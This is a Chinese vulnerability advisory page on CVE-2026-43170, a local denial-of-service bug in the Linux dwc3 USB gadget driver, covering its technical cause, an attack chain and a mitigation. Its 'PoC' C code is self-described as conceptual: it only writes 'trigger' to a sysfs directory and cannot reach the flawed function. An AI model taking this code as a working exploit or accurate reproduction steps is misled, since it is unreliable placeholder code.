CVE-2026-43170 CVSS 5.5 中危

CVE-2026-43170 Linux内核USB子系统拒绝服务漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43170

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核dwc3驱动程序存在一处安全漏洞。由于`dwc3_gadget_vbus_draw`函数可能在原子上下文中被调用，而其内部调用的电源管理API包含可能会睡眠的操作，从而触发内核崩溃。本地低权限攻击者可利用此漏洞导致系统拒绝服务。

技术细节

该漏洞位于Linux内核的DWC3 USB Gadget驱动中。核心问题在于`dwc3_gadget_vbus_draw`函数可以在原子上下文（例如中断上下文或持有自旋锁时）中被调用。该函数内部进一步调用了电源管理核心的API。然而，底层PMIC驱动中的某些操作涉及I2C通信或其他可能引起进程睡眠的机制。在禁止睡眠的原子上下文中执行这些可睡眠操作会导致内核检测到非法的调度请求，从而引发“Scheduling while atomic”错误，导致内核崩溃。修复方案是将该操作移至工作队列中执行，以确保其在进程上下文中运行。

攻击链分析

STEP 1

攻击者获取权限

攻击者获得目标Linux系统的本地低权限用户访问权限。

STEP 2

触发USB Gadget操作

攻击者执行特定的系统调用或脚本，通过USB Gadget接口请求更改VBUS电流设置。

STEP 3

进入原子上下文

内核在处理该请求时，在原子上下文（如中断处理）中调用了`dwc3_gadget_vbus_draw`函数。

STEP 4

调用可睡眠API

该函数进而调用电源管理核心API，底层PMIC驱动尝试执行睡眠操作（如I2C通信）。

STEP 5

内核崩溃

由于在原子上下文中非法睡眠，内核触发panic，导致系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43170: Triggering atomic context sleep in dwc3
 * This is a conceptual demonstration. On a vulnerable system,
 * interacting with the USB gadget power settings can trigger a crash.
 */

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>

#define GADGET_PATH "/sys/class/udc/" // Example path, varies by system

int main() {
    printf("Attempting to trigger CVE-2026-43170...\n");
    
    // In a real scenario, this would involve specific ioctl calls or
    // sysfs writes that trigger dwc3_gadget_vbus_draw from an atomic context.
    // For example, rapid state changes or power draw requests.
    
    int fd = open(GADGET_PATH, O_WRONLY);
    if (fd < 0) {
        perror("Failed to open gadget interface");
        return 1;
    }
    
    // Simulate triggering the vbus draw logic
    // Note: Actual reproduction requires specific hardware and kernel config.
    write(fd, "trigger", 7);
    
    close(fd);
    printf("Check dmesg for kernel panic or 'Scheduling while atomic'.\n");
    return 0;
}

影响范围

Linux Kernel（修复补丁发布前的版本，具体参考Git提交记录）

防御指南

临时缓解措施

建议限制非特权用户对USB设备节点及相关sysfs接口的访问权限，直到完成内核升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表